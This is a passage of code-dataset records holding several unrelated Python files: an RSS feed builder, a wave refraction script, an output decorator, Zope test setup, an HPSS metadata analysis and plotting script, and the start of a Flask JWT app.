j[1].strip('»«:;\"')\n pos.append([c, j[3]])\n\n#print(pos)\n\ndict_pos_words = {}\ndict_pos = {}\n\n#print(len(pos))\n\nfor i in pos:\n if i[1] not in dict_pos_words:\n dict_pos_words[i[1]] = 1\n else:\n j = dict_pos_words[i[1]] + 1\n dict_pos_words[i[1]] = j\n\nfor i in pos:\n if (i[0], i[1]) not in dict_pos_words:\n dict_pos_words[(i[0], i[1])] = 1\n else:\n j = dict_pos_words[(i[0], i[1])] + 1\n dict_pos_words[(i[0], i[1])] = j\n\nfor i in pos:\n if i[0] not in dict_pos_words:\n dict_pos_words[i[0]] = 1\n else:\n j = dict_pos_words[i[0]] + 1\n dict_pos_words[i[0]] = j\n\n\n#print(dict_pos_words)\n\nt = []\nfor i in pos:\n if i[1] not in t:\n t.append(i[1])\n\n#print(t)\n\ntt = []\nfor i in pos:\n if i not in tt:\n print(i)\n tt.append(i)\n\n#print(tt)\n\nprint(('form'),('POS'),('count'),('p'))\nfor i in t:\n print(('--'), (i), (dict_pos_words[i]), (dict_pos_words[i] / 100))\nfor i in tt:\n print((i[0]), (i[1]), (dict_pos_words[i[0]]), (dict_pos_words[(i[0], i[1])] / dict_pos_words[i[0]]))\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"160515113","text":"import datetime\nfrom rfeed import *\nfrom dateutil.parser import parse\n\ndef get_rss_for_json(data):\n items = []\n for article in data['articles']:\n pubDate = datetime.datetime.now()\n try:\n pubDate = parse(article['publishedAt'])\n except:\n pass\n item = Item(\n \ttitle = article['title'],\n \tlink = article['url'],\n \tdescription = article['description'],\n author = article['author'],\n guid = Guid(article['url']),\n \tpubDate = pubDate)\n items.append(item)\n\n feed = Feed(title = \"Newsapi RSS Feed\",\n \tlink = \"https://newsapi.org\",\n \tdescription = \"Newsapi\",\n \tlanguage = \"en-US\",\n \tlastBuildDate = datetime.datetime.now(),\n \titems = items)\n\n return 
feed.rss()\n","sub_path":"rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"452243447","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 28 22:54:08 2019\r\n\r\n@author: AHIABA\r\n\"\"\"\r\nimport gdal\r\nimport math\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nmpl.use('Qt5Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport time\r\nimport numpy as np\r\n\r\n\r\n\r\ndef generate_conditions(input_tiff, initial_angle, wave_period,init_wave_height):\r\n \"\"\"\r\n Accepts Bathymetry data and initial wave conditions, and returns an image of the water region with quiver plots of refraction.\r\n :param wave_period: Period of the wave in Seconds\r\n :param input_tiff: Location of the bathymetry data in TIFF format, on disk.\r\n :param initial_angle: Initial Wave Angle\r\n :return:\r\n \"\"\"\r\n \r\n g = 9.81 # Gravity\r\n init_ang = \"Quiver plot of \" + str(initial_angle) + \" degrees Incidence wave\"\r\n initial_angle = np.deg2rad(initial_angle)\r\n wave_length = g * (wave_period ** 2) / (2 * np.pi)\r\n initial_celerity = wave_length / wave_period\r\n\r\n gdal_ds = gdal.Open(input_tiff)\r\n gdal_band = gdal_ds.GetRasterBand(1)\r\n nodataval = gdal_band.GetNoDataValue()\r\n\r\n grid_size = 50\r\n data_array = rot270(gdal_ds.ReadAsArray().astype(np.float))\r\n rows, cols = data_array.shape\r\n data_array = data_array[\r\n 0 : (rows // grid_size * grid_size), 0 : (rows // grid_size * grid_size)\r\n ]\r\n\r\n if np.any(data_array == nodataval):\r\n data_array[data_array == nodataval] = np.nan\r\n\r\n out_full_path, file_name = generate_output_name(\"png\")\r\n\r\n fig = plt.figure(figsize=(25, 20))\r\n #plt.show()\r\n # Plot contour using matplotlib\r\n plt.contour(data_array, cmap=\"viridis\", levels=list(range(-1200, 0, 50)))\r\n plt.colorbar()\r\n\r\n rows, cols = data_array.shape\r\n\r\n # Create a grid representation of depths where each grid is a square of length 'grid_size'\r\n depths = np.average(\r\n np.split(\r\n np.average(\r\n np.split(data_array, math.ceil(cols / grid_size), axis=1), axis=-1\r\n ),\r\n math.ceil(rows / grid_size),\r\n axis=1,\r\n ),\r\n axis=-1,\r\n )\r\n\r\n # Data is negative to indicate depths, but we need the value of the depths, so convert to positive.\r\n# depths = np.where(depths < 0, -depths, 0)\r\n\r\n # From formula\r\n celerity = np.sqrt(g * depths)\r\n\r\n # From formula\r\n wave_directions = np.arcsin((celerity * np.sin(initial_angle)) / initial_celerity)\r\n\r\n # Replace 'nan' with initial angle.\r\n wave_directions = np.where(\r\n np.isnan(wave_directions), initial_angle, wave_directions\r\n )\r\n #plt.show()\r\n # Quiver arrows\r\n U = np.sin(wave_directions)\r\n V = np.cos(wave_directions)\r\n \r\n X, Y = np.meshgrid(np.arange(0, rows, grid_size), np.arange(0, cols, grid_size))\r\n# fig = plt.figure()\r\n# plt.subplot\r\n# plt.show()\r\n # Plot Quiver diagrams over the contour using matplotlib\r\n q = plt.quiver(X, Y, U, V)\r\n plt.quiverkey(q, X=0.3, Y=1.1, U=10, label=str(init_ang), labelpos=\"E\")\r\n \r\n \r\n # Plot configurations\r\n plt.gca().set_aspect(\"equal\", adjustable=\"box\")\r\n plt.savefig(out_full_path, bbox_inches=\"tight\")\r\n plt.show() \r\n depth_val = \"Respective Grid Points for the Wave Heights: \"\r\n return file_name,depth_val,depths\r\ndef generate_output_name(file_format=\"png\"):\r\n file_name = \"{}.{}\".format(int(time.time()), file_format)\r\n\r\n # Replace line 
below with absolute path to output directory.\r\n out_dir = r'C:/Users/AHIABA/Desktop'\r\n return os.path.join(out_dir, file_name), file_name\r\n\r\n\r\ndef rot270(array):\r\n \"\"\"\r\n Rotates a numpy array by 270 degrees.\r\n :param array:\r\n :return:\r\n \"\"\"\r\n return np.rot90(np.rot90(np.rot90(array)))\r\n\r\ng = 9.81\r\nenter_file_name = input(\"Enter the directory where the .tif/.netCDF file is saved: \")\r\ng = 9.81\r\nT = float(input('Input Period: '))\r\nHo = float (input('Input wave height: '))\r\nd = float(input ('Input Depth of water: '))\r\nA= int(input ('Input initial angle: '))\r\nfor i in range(int(T),0,-1):\r\n Lo = float((g * pow(i,2))/(2* math.pi))\r\n\r\n Co = Lo/i\r\n \r\n Steepness = Ho/Lo\r\n U = float((math.pi * Ho)/i)\r\n\r\n \r\n C = float(math.sqrt(g * d))\r\n\r\n L = float (C * i)\r\n\r\n \r\n B = math.sin(A * (math.pi/180))\r\n D = Co/C\r\n E = B * D\r\n Alpha = Co*math.sin(A)/C\r\n \r\n Kr = round(math.sqrt(math.cos(A * math.pi/180)/math.cos(Alpha * math.pi/180)),2)\r\n\r\n Ks = round(math.sqrt(Co/(2*C)),2)\r\n\r\n H = Ho * round(Kr,2) * round(Ks,2)\r\n \r\n print(\"Wave Period\\t\\tWave Height\\t\\tCoeff of Shaoling\\t\\tWL(Deep-Water)\\t\\tWL(Shallow-Water)\\t\\tAngle between Crests\")\r\n print(i,\"\\t\\t\\t\",H,\"\\t\\t\\t\",round(Ks,3),\"\\t\\t\\t\",round(Lo,3),\"\\t\\t\\t\",round(L,3),\"\\t\\t\\t\",math.degrees(Alpha))\r\nprint(\"Coefficient of Refraction= \",round(Kr,3))\r\nprint ('Final Wave Height = ',H)\r\nresult = generate_conditions(enter_file_name,A,T,Ho)\r\nprint(result)\r\nprint(\"The Final Wave Height: \",H)\r\ninputs = input(\"Press any Key to exit...\")","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"213243287","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport inspect\nfrom time import gmtime, strftime\n\n\nclass OutputDecorator:\n \n def __init__(self, out, prefix):\n \"\"\"\n \n \n Args:\n out: Original output stream.\n prefix: A prefix string to be attached to each line. \n #F will be replaced with invoking method name.\n #T with current time.\n #S adjust prefix width by 10 characters \n e.g. #S#S#S forces prefix width to be at least 30. 
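 For illustration only (caller name and timestamp invented): a prefix of '#T #F | ' would render a written line roughly as '2020-01-01 00:00:00 my_method | hello'.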
\n \"\"\"\n self._out = out \n self._prefix = prefix.replace(\"#S\", \"\")\n self._hash_f = \"#F\" in prefix\n self._hash_t = \"#T\" in prefix\n self._adjust_prefix_size = prefix.count(\"#S\")*10\n self._last_char = \"\\n\"\n\n @staticmethod\n def astrlen(s, l=30):\n return s.ljust(l, \" \")\n \n def write(self, txt):\n if len(txt)==0: return \n \n #format prefix\n prefix = self._prefix\n if self._hash_f: \n curframe = inspect.currentframe()\n calframe = inspect.getouterframes(curframe, 2)\n prefix = prefix.replace(\"#F\", calframe[1][3])\n if self._hash_t:\n prefix = prefix.replace(\"#T\", strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n prefix = OutputDecorator.astrlen(prefix, self._adjust_prefix_size)\n \n #format output\n if self._last_char==\"\\n\":\n self._out.write(prefix)\n self._out.write(txt.rstrip(\"\\n\").replace(\"\\n\", \"\\n%s\" % prefix)) \n self._last_char = txt[-1]\n if self._last_char==\"\\n\":\n self._out.write(\"\\n\") \n \n \n ","sub_path":"ui/out_formatter.py","file_name":"out_formatter.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"26651404","text":"import os\nimport unittest\n\nfrom zope.testing import doctest\nfrom zope.app.testing import functional\n\nminimal_zcml = os.path.join(os.path.dirname(__file__), 'minimal-ftesting.zcml')\nTestMinimalLayer = functional.ZCMLLayer(\n minimal_zcml, __name__, 'TestMinimalLayer')\npagelet_zcml = os.path.join(os.path.dirname(__file__), 'pagelet-ftesting.zcml')\nTestPageletLayer = functional.ZCMLLayer(\n pagelet_zcml, __name__, 'TestPageletLayer')\n\noptionflags = doctest.NORMALIZE_WHITESPACE + doctest.ELLIPSIS\n\ndef setUp(test):\n functional.FunctionalTestSetup().setUp()\n\ndef tearDown(test):\n functional.FunctionalTestSetup().tearDown()\n\ndef test_suite():\n suite = unittest.TestSuite()\n dottedname = 'mars.layer.ftests.%s'\n for name in ['minimal', 'directive']:\n test = doctest.DocTestSuite(\n dottedname % name, setUp=setUp,\n tearDown=tearDown, optionflags=optionflags)\n test.layer = TestMinimalLayer\n suite.addTest(test)\n test = doctest.DocTestSuite(\n dottedname % 'pagelet', setUp=setUp,\n tearDown=tearDown, optionflags=optionflags)\n test.layer = TestPageletLayer\n suite.addTest(test)\n return suite\n\n\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n\n\n","sub_path":"Sandbox/darrylcousins/tfws.website/mars.layer/mars/layer/ftests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"180108288","text":"#!/usr/bin/env python2\n\n\"\"\"analyze.py: Reads and analyzes ecfs metadata db dump.\"\"\"\n__author__ = \"Matthias Grawinkel\"\n__status__ = \"Production\"\n\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib import pyplot\nfrom matplotlib import dates\n\nimport numpy as np\n\nimport sys\nimport os\nimport gzip\nimport time\nimport calendar\nimport datetime\nimport resource\nimport re\nimport math\nimport json\n\nfrom collections import defaultdict\nfrom collections import Counter\n\nimport hashlib\n\nfrom file_size_groups import *\n\nMONITOR_LINES=100000\n\n# used for cdf plot\nspace_per_uid = Counter()\nfiles_per_uid = Counter()\n\n\n# used for file size histogram\nnum_files_per_size_category = Counter()\ntotal_size_per_size_category = Counter()\n\n# file_size_counter = Counter()\n\nfiles_per_dir_counter = 
Counter()\n\nstats = defaultdict(int)\n\n# how many .grib files are there?\nfile_extension_cnt = Counter()\nfile_extension_size = Counter()\n\ncreated_capacity_cnt = defaultdict(int)\ncreated_capacity_size = defaultdict(int)\n\nmodified_capacity_cnt = defaultdict(int)\nmodified_capacity_size = defaultdict(int)\n\n\n# this one will get HUUUUUGE\nfile_map = dict()\n\ndef prettyfy(number):\n d = float(number)\n if d - int(d) > 0:\n return '{:,.3f}'.format(d)\n return '{:,d}'.format(int(d))\n\ndef to_gigabyte(val):\n return (float(val) / 1024 / 1024 / 1024)\n\ndef to_terabyte(val):\n return (float(val) / 1024 / 1024 / 1024 / 1024)\n\ndef to_petabyte(val):\n return (float(val) / 1024 / 1024 / 1024 / 1024 / 1024)\n\ndef to_millions(val):\n return (float(val) / 1000 / 1000)\n\ndef to_billions(val):\n return (float(val) / 1000 / 1000 / 1000)\n\nclass Timer():\n def __init__(self, s):\n self.s = s\n\n def __enter__(self):\n self.start = time.time()\n\n def __exit__(self, *args):\n print (\"%s: %fs\" % (self.s, (time.time() - self.start)))\n\n\ndef get_md5(s, hexdigest=False):\n # return s\n m = hashlib.md5()\n m.update(s.encode())\n if hexdigest:\n return m.hexdigest()\n else:\n return m.digest()\n\n\n\ndef days_between(ts1, ts2):\n \"\"\"\n '20050620-004900',\n '19700101-000000',\n '20120615-075612',\n \"\"\"\n if ts1 == '19700101-000000' or ts2 == '19700101-000000':\n return None\n\n t1 = datetime.datetime.strptime(ts1, \"%Y%m%d-%H%M%S\")\n t2 = datetime.datetime.strptime(ts2, \"%Y%m%d-%H%M%S\")\n return (t1 - t2).days\n\n\ndef load(source_file, max_lines=None,log_start=\"20140905-000000\"):\n\n object_re = re.compile(\"^\\s*([\\d]+)\\s*([\\d]+)\\s*([\\d]+)\\s*([\\d]+)\\s*([\\d]+-[\\d]+)\\s*([\\d]+-[\\d]+)\\s*([\\d]+-[\\d]+)\\s*([a-zA-Z0-9/.\\-]+)\\s*x'([[a-zA-Z0-9/.\\-]+)'\\s*$\")\n\n\n with gzip.open(source_file, 'rt') as source:\n t = time.time()\n plines = 0\n for line in source:\n plines += 1\n if plines % MONITOR_LINES == 0:\n print (\"processed lines: %d, mem: %rMB, lines/s: %r: found files: %d\" %\n (plines,\n float(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss) / 1024 / 1024,\n int(MONITOR_LINES / (time.time() - t)),\n len(file_map)\n )\n )\n t = time.time()\n\n if max_lines:\n if plines >= max_lines:\n break\n\n m = object_re.match(line)\n\n if m:\n r = m.groups()\n\n size = int(r[0])\n uid = int(r[1])\n gid = int(r[2])\n cos = int(r[3]) # cosid is Class-of-Service in HPSS\n creation_time = str(r[4])\n read_time = str(r[5])\n mod_time = str(r[6])\n path = str(r[7])\n magic = str(r[8]) # $bitfileid,$objectid;?\n\n stats[\"total_files\"] += 1\n stats[\"total_size\"] += size\n stats[\"max_file_size\"] = max(stats[\"max_file_size\"], size)\n\n # for cdf\n files_per_uid[uid] += 1\n space_per_uid[uid] += size\n\n # for file size histogram\n g = get_file_size_group(size)\n num_files_per_size_category[g] += 1\n total_size_per_size_category[g] += size\n\n # can be used for average file sizes et al.\n # file_size_counter[size] += 1\n\n #file name\n file_name = os.path.basename(path)\n\n if file_name.__contains__('.'):\n extension = file_name[file_name.rfind('.'):]\n else:\n extension = \"unknown\"\n \n file_extension_cnt[extension] += 1\n file_extension_size[extension] += size\n\n # files per dir\n dir_id = get_md5(os.path.dirname(path))\n files_per_dir_counter[dir_id] += 1\n\n # access times\n file_age_days = days_between(log_start, creation_time)\n\n created_capacity_cnt[file_age_days] += 1\n created_capacity_size[file_age_days] += size\n \n last_read_days = days_between(log_start, 
read_time)\n if not last_read_days:\n stats[\"unread_files_cnt\"] += 1\n stats[\"unread_files_size\"] += size\n \n last_modified_days = days_between(log_start, mod_time)\n modified_capacity_cnt[file_age_days] += 1\n modified_capacity_size[file_age_days] += size\n\n file_db_entry = (size, file_age_days, last_read_days, last_modified_days)\n\n # this will get large, but is required for the more interesting plots.\n file_map[get_md5(path)] = file_db_entry\n\n # how many days ago did a directory see its last upload / download / change?\n # how many files exist that have not been accessed since X days / never been read at all?\n # file_age to capacity?\n\ndef generate_x_labels(log_start):\n \n x_vals = list()\n deltas = list()\n day_0 = datetime.datetime.strptime(log_start, \"%Y%m%d-%H%M%S\")\n\n deltas.append(0)\n x_vals.append(day_0)\n \n d = day_0.replace(day=1)\n for i in range(80):\n delta = (day_0 - d).days\n deltas.append(delta)\n # print (d, delta)\n d -= datetime.timedelta(days=10)\n d = d.replace(day=1)\n x_vals.append(d)\n\n return x_vals, deltas\n\ndef unaccessed_files_plot(target_graph_dir, log_start, source_type):\n\n print(str(datetime.datetime.now()), \"start to prepare unaccessed_files_plot\")\n \n # these metrics will be plotted.\n unaccessed_files_cnt = Counter()\n unmodified_files_cnt = Counter()\n unread_files_cnt = Counter()\n total_created_files = Counter()\n existing_never_read_files = Counter()\n\n # index to filemap contents\n CREATION_DAYS = 1\n READ_DAYS = 2\n MODIFIED_DAYS = 3\n\n x_val_dates, deltas = generate_x_labels(log_start)\n x_val_dates = dates.date2num(x_val_dates)\n\n for days in deltas:\n # print (days)\n\n for f in file_map.itervalues():\n # print (f)\n if f[CREATION_DAYS] > days:\n total_created_files[days] += 1\n # make sure the file actually exists\n\n if f[READ_DAYS] and f[MODIFIED_DAYS]:\n if days < min(f[READ_DAYS], f[MODIFIED_DAYS]):\n unaccessed_files_cnt[days] += 1\n\n if days < f[MODIFIED_DAYS]:\n unmodified_files_cnt[days] += 1\n\n if days < f[READ_DAYS]:\n unread_files_cnt[days] += 1\n\n else:\n existing_never_read_files[days] += 1\n # some files have no f[2] (read_time) value\n if days < f[MODIFIED_DAYS]:\n unaccessed_files_cnt[days] += 1\n unmodified_files_cnt[days] += 1\n # print(json.dumps(unaccessed_files_cnt, sort_keys=True, indent=2))\n print(str(datetime.datetime.now()), \"plotting unaccessed_files_plot\")\n \n y_vals = defaultdict(list)\n \n ax_files = [(total_created_files, \"Existing files\", 'k', ':o'),\n (unaccessed_files_cnt, \"Unaccessed files\", 'r', '-s'),\n (unmodified_files_cnt,\"Unmodified files\", 'g', '--*'), \n (unread_files_cnt, \"Unread files\", 'b', '-.+'),\n (existing_never_read_files, \"Existing never read files\", 'k', ':x')\n ]\n\n for p in ax_files:\n for key in deltas:\n y_vals[p[1]].append(to_millions(p[0][key]))\n \n\n fig, ax = pyplot.subplots()\n pyplot.xticks(rotation=90)\n pyplot.tick_params(labelsize=16)\n \n for p in ax_files:\n key_name = p[1]\n col = p[2]\n linestyle = p[3]\n\n ax.plot(x_val_dates, y_vals[key_name], linestyle, linewidth=2, color=col, label=key_name)\n\n if source_type == \"ECFS\":\n ax.legend(loc=\"upper left\")\n else:\n ax.legend(loc=\"center left\")\n\n\n ylabela = ax.set_ylabel('Existing files in mil', fontsize=24)\n \n #============ DATE FORMATTING =================\n ax.xaxis.set_major_locator(dates.MonthLocator(bymonth=[1,4,7,10]))\n ax.xaxis.set_minor_locator(dates.MonthLocator(interval=1))\n ax.xaxis.set_major_formatter(dates.DateFormatter('%Y/%m'))\n \n #============ /DATE 
FORMATTING =================\n\n    ax.yaxis.grid(True)\n    ax.xaxis.grid(True)\n    \n    sizes = fig.get_size_inches()\n    fig.set_size_inches(sizes[0]*1.5, sizes[1])\n\n    pyplot.tight_layout()\n    outfile = os.path.join(target_graph_dir, \"unaccessed_files_plot.pdf\")\n    pyplot.savefig(outfile, bbox_extra_artists=[ylabela], bbox_inches='tight')\n    print(\"saved %s\" % (outfile))\n    pyplot.close()\n\n\n    ###########################################\n    # print(json.dumps(unaccessed_files_cnt, sort_keys=True, indent=2))\n    print(str(datetime.datetime.now()), \"plotting unaccessed_files_plot_2\")\n    \n    # x_vals = defaultdict(list)\n    y_vals = defaultdict(list)\n    # right_y_vals = defaultdict(list)\n\n    ax_files = [(unaccessed_files_cnt, \"Unaccessed files\", 'r', '-s'),\n                (unmodified_files_cnt,\"Unmodified files\", 'g', '--*'), \n                (unread_files_cnt, \"Unread files\", 'b', '-.+'),\n                (existing_never_read_files, \"Existing never read files\", 'k', ':x')\n                ]\n\n    for p in ax_files:\n        # relative fraction to created files\n        # y_temp = 0\n        for key in deltas:\n            # print (\"x:%d, y:%d\" % (key.p))\n            # x_vals[p[1]].append(key)\n            frac = float(p[0][key]) / float(total_created_files[key]) * 100\n            y_vals[p[1]].append(frac)\n\n    fig, ax = pyplot.subplots()\n    pyplot.xticks(rotation=90)\n    pyplot.tick_params(labelsize=16)\n    \n    for p in ax_files:\n        key_name = p[1]\n        col = p[2]\n        linestyle = p[3]\n\n        ax.plot(x_val_dates, y_vals[key_name], linestyle, linewidth=2, color=col, label=key_name)\n\n    if source_type == \"ECFS\":\n        ax.legend(loc=\"lower right\") \n    else:\n        #MARS\n        ax.legend(loc=\"center left\") \n\n    ylabela = ax.set_ylabel('Percent of existing files', fontsize=24)\n    \n    #============ DATE FORMATTING =================\n    ax.xaxis.set_major_locator(dates.MonthLocator(bymonth=[1,4,7,10]))\n    ax.xaxis.set_minor_locator(dates.MonthLocator(interval=1))\n    ax.xaxis.set_major_formatter(dates.DateFormatter('%Y/%m'))\n    \n    ax.yaxis.grid(True)\n    ax.xaxis.grid(True)\n    \n    sizes = fig.get_size_inches()\n    fig.set_size_inches(sizes[0]*1.5, sizes[1])\n\n    pyplot.tight_layout()\n    outfile = os.path.join(target_graph_dir, \"unaccessed_files_plot_2.pdf\")\n    pyplot.savefig(outfile, bbox_extra_artists=[ylabela], bbox_inches='tight')\n    print(\"saved %s\" % (outfile))\n    pyplot.close()\n\n\ndef cdf_file_sizes_capacity(outfile):\n\n    x_vals = np.arange(1, len(total_size_per_size_category) + 1)\n\n    y_temp = 0\n    y_vals = list()\n    for v in [to_petabyte(total_size_per_size_category[x]) for x in sorted(total_size_per_size_category.iterkeys())]:\n        y_temp += v\n        y_vals.append(y_temp)\n    \n    fig, ax = pyplot.subplots()\n    \n    \n    ax.plot(x_vals, y_vals, \"-\", linewidth=2, color='b')\n\n    ax.set_ylabel('Total Capacity in PB', fontsize=20)\n    \n    labels = [get_group_name(x) for x in sorted(total_size_per_size_category.iterkeys())]\n    ax.set_xticks(x_vals)\n    ax.set_xticklabels(labels, rotation=90)\n    ax.tick_params(labelsize=14)\n    ax.set_xlim(1,len(total_size_per_size_category)+1)\n    ax.yaxis.grid(True)\n    ax.xaxis.grid(True)\n    \n    sizes = fig.get_size_inches()\n    fig.set_size_inches(sizes[0]*1.3, sizes[1])\n\n    pyplot.tight_layout()\n    pyplot.savefig(outfile)\n    print(\"saved %s\" % (outfile))\n    pyplot.close()\n\ndef histogram_of_file_sizes(target_file):\n    fig, ax = pyplot.subplots()\n    # print (data)\n    # num_files_per_size_category\n    \n    x_pos = np.arange(1, len(num_files_per_size_category) + 1)\n\n    y_vals = [to_millions(num_files_per_size_category[x]) for x in sorted(num_files_per_size_category.iterkeys())]\n\n    pyplot.bar(x_pos, y_vals, width=0.8, align='center', color=\"0.5\")\n\n    labels = 
[get_group_name(x) for x in sorted(num_files_per_size_category.iterkeys())]\n\n # a = ax.get_xticks().tolist()\n # print(a)\n\n ax.set_xticks(x_pos)\n ax.set_xticklabels(labels, rotation=90)\n ax.tick_params(labelsize=14)\n ax.set_ylabel('Number of files in mil', fontsize=24)\n # ax.set_xlabel('File size group', fontsize=24)\n\n # We change the fontsize of minor ticks label \n ax.yaxis.grid(True)\n # ax2.yaxis.grid(True)\n # ax.xaxis.grid(True)\n\n sizes = fig.get_size_inches()\n fig.set_size_inches(sizes[0]*1.2, sizes[1])\n\n pyplot.tight_layout()\n \n pyplot.savefig(target_file)\n print(\"saved %s\" % (target_file))\n pyplot.close()\n\n\n\n\ndef stats_to_latex_table(target_file, source_type=\"ECFS\"):\n with open(target_file, 'wt') as tf:\n tf.write(\"\\\\begin{table}[ht!]\\n\")\n tf.write(\"\\\\scriptsize\\n\")\n tf.write(\"\\\\centering\\n\")\n tf.write(\"{\\n\")\n tf.write(\"\\\\begin{tabular}{|r|r|}\\n\")\n tf.write(\"\\\\hline\\n\")\n tf.write(\"\\\\multicolumn{2}{|c|}{\\\\textbf{File system stats}}\\\\\\\\\\\\hline\\n\")\n tf.write(\"Total \\#files & %s\\\\\\\\\\\\hline\\n\" % (prettyfy(stats[\"total_files\"])))\n tf.write(\"Total used capacity & %s\\\\,PB\\\\\\\\\\\\hline\\n\" % (prettyfy(to_petabyte(stats[\"total_size\"]))))\n tf.write(\"Max file size & %s\\\\,GB\\\\\\\\\\\\hline\\n\" % (prettyfy(to_gigabyte(stats[\"max_file_size\"]))))\n tf.write(\"\\#Directories& %s\\\\\\\\\\\\hline\\n\" % (prettyfy(len(files_per_dir_counter))))\n \n max_files_per_dir = files_per_dir_counter.most_common(1)[0][1]\n tf.write(\"Max files per directory & %s\\\\\\\\\\\\hline\\n\" % (prettyfy(max_files_per_dir)))\n\n tf.write(\"\\#Files never read & %s\\\\\\\\\\\\hline\\n\" % (prettyfy(stats[\"unread_files_cnt\"])))\n tf.write(\"Capacity of never read files & %s\\\\,PB\\\\\\\\\\\\hline\\n\" % (prettyfy(to_petabyte(stats[\"unread_files_size\"]))))\n tf.write(\"\\\\hline\\n\")\n \n if source_type == \"ECFS\":\n # most common file extensions, and how much space they take\n \n tf.write(\"\\\\multicolumn{2}{|c|}{\\\\textbf{Most common file types}}\\\\\\\\\\\\hline\\n\")\n tf.write(\"\\\\textbf{by file count} & \\\\textbf{by used capacity}\\\\\\\\\\\\hline\\n\")\n \n by_count = file_extension_cnt.most_common(10)\n by_size = file_extension_size.most_common(10)\n\n for i in range(min(len(by_count), len(by_size))):\n tf.write(\"%s (%.4f%s) & %s (%.4f%s)\\\\\\\\\\\\hline\\n\" % (\n by_count[i][0],\n float(by_count[i][1]) / stats[\"total_files\"] * 100,\n \"\\%\",\n by_size[i][0],\n float(by_size[i][1]) / stats[\"total_size\"] * 100,\n \"\\%\"\n ))\n tf.write(\"\\\\end{tabular}\\n\")\n tf.write(\"}\\n\")\n\n \n tf.write(\"\\\\caption{ECFS file system statistics}\\n\")\n tf.write(\"\\\\label{table:ecfs_db_file_types_statistics}\\n\")\n else:\n tf.write(\"\\\\caption{MARS file system statistics}\\n\")\n tf.write(\"\\\\label{table:mars_db_file_types_statistics}\\n\")\n tf.write(\"\\\\end{table}\\n\")\n\n print(\"wrote: %s\" % (target_file))\n\ndef store_stats(stats_file):\n\n # print(json.dumps(stats, indent=2, sort_keys=True))\n # print(json.dumps(num_files_per_size_category, indent=2, sort_keys=True))\n # print(json.dumps(file_extension_cnt, indent=2, sort_keys=True))\n # print(json.dumps(file_extension_size, indent=2, sort_keys=True))\n \n s = dict()\n\n s[\"stats\"] = stats\n s[\"num_files_per_size_category\"] = num_files_per_size_category\n s[\"file_extension_cnt\"] = file_extension_cnt\n s[\"file_extension_size\"] = file_extension_size\n\n with open(stats_file, 'wt') as sf:\n json.dump(s, sf, indent=4, 
sort_keys=True)\n\n\nif __name__ == \"__main__\":\n\n    if len(sys.argv) != 4:\n        print(\"usage: %s source_file target_graph_dir source_type\" % sys.argv[0])\n        sys.exit(1)\n\n    source_file = os.path.abspath(sys.argv[1])\n    target_graph_dir = os.path.abspath(sys.argv[2])\n    source_type = sys.argv[3]\n\n\n    print(\"source_file == %s\" % (source_file))\n    print(\"target_graph_dir == %s\" % (target_graph_dir))\n    print(\"source_type == %s\" % (source_type))\n\n    if not os.path.exists(source_file):\n        print(\"source: %s does not exist\" % source_file)\n        sys.exit(1)\n\n    if not os.path.exists(target_graph_dir):\n        print(\"target_graph_dir: does not exist: %s\" % target_graph_dir)\n        sys.exit(1)\n\n    with Timer(\"Loading data\"):\n        if source_type == \"ECFS\":\n            print(\"loading ECFS\")\n            log_start=\"20140905-000000\"\n        else:\n            print(\"loading MARS\")\n            log_start=\"20140904-000000\"\n\n        # load(source_file, max_lines=1000000, log_start=log_start)\n        load(source_file, log_start=log_start)\n\n    with Timer(\"Plot unaccessed Files\"):\n        unaccessed_files_plot(target_graph_dir, log_start, source_type)\n\n    # with Timer(\"Plot unaccessed Files\"):\n    #     unaccessed_files_plot_2(os.path.join(target_graph_dir, \"unaccessed_files_plot_2.pdf\"), log_start, source_type)\n\n    with Timer(\"Plot histogram of File Sizes\"):\n        histogram_of_file_sizes(os.path.join(target_graph_dir, \"histogram_file_sizes.pdf\"))\n    \n    with Timer(\"Plot CDF over File Sizes\"):\n        cdf_file_sizes_capacity(os.path.join(target_graph_dir, \"cdf_over_file_sizes.pdf\"))\n    \n    stats_to_latex_table(os.path.join(target_graph_dir, \"db_stats.tex\"), source_type)\n\n    with Timer(\"Store stats\"):\n        store_stats(os.path.join(target_graph_dir, \"stats.json\"))\n","sub_path":"hpss_db_dump/src/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":18789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"36819118","text":"from flask import Flask\nfrom flask_restful import Api\nfrom flask_jwt_extended import JWTManager\nfrom flask_cors import CORS\n\nfrom db import db\nfrom ma import ma\nfrom blacklist import BLACKLIST\nfrom resources.user import UserRegister, UserLogin, User, UserLogout, Users\nfrom resources.role import UserRole, UserRoles\nfrom resources.drug import Drugs, Drug, RegisterDrug, DoctorDrug, DrugName\nfrom resources.patient import PatientSearchById, Patient, Patients, PatientSearchByNationalId\nfrom resources.recipe import Recipe, SearchRecipeById, RecipeSpend\n\napp = Flask(__name__)\napp.secret_key = \"you will never guess password\"\napp.config.from_object(\"config\")\nCORS(app)\n\napi = Api(app)\n\njwt = JWTManager(app)\n\n\n@jwt.token_in_blacklist_loader\ndef check_if_token_in_blacklist(decrypted_token):\n    return (\n        decrypted_token[\"jti\"] in BLACKLIST\n    